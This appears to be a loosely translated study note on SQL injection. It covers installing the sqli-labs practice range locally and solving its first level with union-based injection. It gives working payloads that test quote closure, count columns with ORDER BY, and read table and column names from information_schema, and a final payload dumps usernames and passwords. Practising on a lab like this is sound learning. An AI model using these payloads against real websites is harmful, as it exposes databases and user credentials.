SQL learning
One, understand SQL
What is SQL
What is SQL injection
SQL injection process
Two, joint injection
Install
1. Download PHP (because the previous two studies have been downloaded)
2. Download link: sqli-labs-master.zip . After decompression, put it in the www directory of phpstudy_pro and run it.
Note: The php operating environment of sqli-labs does not support php7, you need to set the php version of phpstudy_pro to 5. (Don't ask me why, I just know it anyway)
3. Modify the account and password in the sqli-labs/sql-connections/credb.inc file (set your own mysql account and password)
4. Enter the address http://localhost/ sqli-labs-master or http://127.0.01/sqli-labs-master, get the following picture:
click setup/reset Database for labs, get the following picture to show that the shooting range is completed.
Note: Refer to the link and attach
suggestions for shooting range It is very convenient to use the Firefox browser and the hackbar in Firefox to make a shooting range
Shooting range first pass
1. Judge the closure
There are generally four types of closed symbols.', ",'), ") plus comments are in line with –+
input?id=1' (") (')) (")) --+
where', the following figure is obtained, namely It is the correct closing match.
If output ?id=1, 2, 3... different numbers, different results will appear
2. Judge the number of columns
Use the order by statement to judge
Enter?id=1' order by 1 (or 2, 3, 4...) --+
The echoes from 1 to 3 are all normal, and the following figure (echo error) appears when it reaches 4,
indicating the number of columns Is 3
3. Joint injection
Determine the echo position:
input:?id=0' union select 1,2,3–+ to get the echo position. The
echo position is in the second position
. The name of the database is
revealed : because the echo position is the second position, so Modify the
output in the second place :?id=0' union select 1,database(),3–+It
appears that the database name is: security
bursts the data table name:
input:?id=0' union select 1, group_concat( table_name),3 from information_schema.tables where table_schema='security' --+
Access results are as follows:
Then blast out the field
input on the table users :?id=0' union select 1, group_concat(column_name),3 from information_schema .columns where table_name='users' --+
Echo results:
Finally, the field value:
input:?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+
Echo results :